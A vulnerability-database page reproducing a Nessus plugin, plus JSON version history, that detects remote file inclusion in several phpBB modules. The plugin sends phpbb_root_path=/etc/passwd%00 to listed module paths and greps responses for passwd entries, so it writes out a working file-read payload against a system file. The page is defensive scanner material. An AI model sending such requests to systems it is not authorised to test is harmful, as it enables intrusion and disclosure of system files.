Search...

phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion

2006-05-04T00:00:00

ID PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host contains a third-party module for phpBB.

The version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

if (NASL_LEVEL &lt; 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(21323);
  script_version("1.40");

  script_cve_id(
    "CVE-2006-2245",
    "CVE-2006-5301",
    "CVE-2006-5306",
    "CVE-2006-5390",
    "CVE-2006-5418",
    "CVE-2006-7090",
    "CVE-2006-7100",
    "CVE-2006-7147",
    "CVE-2007-5009",
    "CVE-2007-5100"
  );
  script_bugtraq_id(
    17822, 
    20484, 
    20485, 
    20493, 
    20501, 
    20518, 
    20525, 
    20558, 
    20571, 
    21171, 
    25737, 
    25776
  );
  script_xref(name:"EDB-ID", value:"2483");
  script_xref(name:"EDB-ID", value:"2522");
  script_xref(name:"EDB-ID", value:"2525");
  script_xref(name:"EDB-ID", value:"2533");
  script_xref(name:"EDB-ID", value:"2538");

  script_name(english:"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion");
  script_summary(english:"Tries to read a local file using phpBB modules");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
remote file include attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host contains a third-party module for phpBB. 

The version of at least one such component or module installed on the
remote host fails to sanitize input to the 'phpbb_root_path' parameter
before using it to include PHP code.  Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker may
be able to exploit these flaws to view arbitrary files on the remote
host or to execute arbitrary PHP code, possibly taken from third-party
hosts." );
  # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9640ab6a" );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2006/Oct/209" );
 script_set_attribute(attribute:"see_also", value:"https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/452012/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/479997/30/0/threaded" );
 # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?37fd2995" );
 script_set_attribute(attribute:"solution", value:
"Disable PHP's 'register_globals' setting or contact the product's
author to see if an upgrade exists." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
 script_cwe_id(94);
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/04");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/05/03");
 script_cvs_date("Date: 2018/11/15 20:50:18");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe",value:"cpe:/a:phpbb_group:phpbb-auction");
 script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("phpbb_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/phpBB");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Vulnerable scripts.
# - modules
nmods = 0;
mod = make_array();
# -   ACP User Registration
mod[nmods++] = "/includes/functions_mod_user.php";
# -   Admin User Viewed Posts Tracker
mod[nmods++] = "/includes/functions_user_viewed_posts.php";
# -   AI chat (included in PlusXL)
mod[nmods++] = "/mods/iai/includes/constants.php";
# -   Import Tools - Members
mod[nmods++] = "/includes/functions_mod_user.php";
# -   Insert User
mod[nmods++] = "/includes/functions_mod_user.php";
# - Journals System
mod[nmods++] = "/includes/journals_delete.php";
mod[nmods++] = "/includes/journals_edit.php";
mod[nmods++] = "/includes/journals_post.php";
# -   phpBB auction
mod[nmods++] = "/auction/auction_common.php";
# -   phpBB Search Engine Indexer
mod[nmods++] = "/includes/archive/archive_topic.php";
# -   phpBB Security
mod[nmods++] = "/includes/phpbb_security.php";
# -   phpBB2 Plus (not really a mod)
mod[nmods++] = "/language/lang_german/lang_main_album.php";
mod[nmods++] = "/language/lang_german/lang_admin_album.php";
mod[nmods++] = "/language/lang_english/lang_main_album.php";
mod[nmods++] = "/language/lang_english/lang_admin_album.php";
# -   PlusXL itself
mod[nmods++] = "/includes/functions.php";
# -   SpamBlockerMod
mod[nmods++] = "/includes/antispam.php";


info = "";
contents = "";


# Test an install.
install = get_kb_item(string("www/", port, "/phpBB"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  dir = matches[2];

  # Try to exploit the flaw to read a file.
  file = "/etc/passwd%00";
  for (i=0; i&lt;nmods; i++)
  {
    r = http_send_recv3(method:"GET", 
     item:string(
        dir, mod[i], "?",
        "phpbb_root_path=", file
      ), 
      port:port
    );
    if (isnull(r)) exit(0);
    res = r[2];

    # There's a problem if...
    if (
      # there's an entry for root or...
      egrep(pattern:"root:.*:0:[01]:", string:res) ||
      # we get an error saying "failed to open stream".
      egrep(pattern:"main\(/etc/passwd\\0.+ failed to open stream", string:res) ||
      # we get an error claiming the file doesn't exist or...
      egrep(pattern:"main\(/etc/passwd\).*: failed to open stream: No such file or directory", string:res) ||
      # we get an error about open_basedir restriction.
      egrep(pattern:"main.+ open_basedir restriction in effect. File\(/etc/passwd", string:res)
    )
    {
      info = info +
             "  " + dir + mod[i] + '\n';

      if (!contents && egrep(string:res, pattern:"root:.*:0:[01]:"))
        contents = res - strstr(res, "&lt;br");

      if (!thorough_tests) break;
    }
  }
}

if (info)
{
  if (contents)
  {
    contents = data_protection::redact_etc_passwd(output:contents);
    info = string(
      info,
      "\n",
      "And here are the contents of the file '/etc/passwd' that Nessus\n",
      "was able to read from the remote host :\n",
      "\n",
      contents
    );
  }
  report = string(
    "The following scripts(s) are vulnerable :\n",
    "\n",
    info
  );

  security_warning(port:port, extra:report);
}

JSON Vulners Source

Initial Source

{"id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.", "published": "2006-05-04T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "reporter": "Tenable", "references": ["https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370", "https://seclists.org/bugtraq/2006/Oct/209", "http://www.nessus.org/u?9640ab6a", "https://www.securityfocus.com/archive/1/452012/30/0/threaded", "https://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?37fd2995"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "type": "nessus", "lastseen": "2019-01-16T20:06:36", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "edd7ee8e3a8af0edb691dfe69de82b00662dc8b2240e7e72ad1340eff430eec5", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "c4b485d682c254d7a96e0721a51e4986", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-09-01T23:56:41", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.39\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 8, "lastseen": "2018-09-01T23:56:41"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 1, "hash": "01199a7dc0f94416277348ea92dbb0131df47bb5c276687aee395dbcae9c8450", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "30f8a3cd16450f4fae9f6381156dd10d", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6c23fe739a0794bded389ced7f4df2f1", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "3608c1d3b0f5b19a656f521c1870c4aa", "key": "sourceData"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2016-09-26T17:25:32", "modified": "2016-05-20T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://archives.neohapsis.com/archives/bugtraq/2006-10/0210.html", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.phpbb2.de/ftopic45218.html", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.35 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://archives.neohapsis.com/archives/bugtraq/2006-10/0210.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb2.de/ftopic45218.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2016/05/20 14:30:35 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:32"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 2, "hash": "6f585a87ac0b735771ccebbabbcbc84d30ab14dc4f3072dcfe4c1e2edad5f905", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": 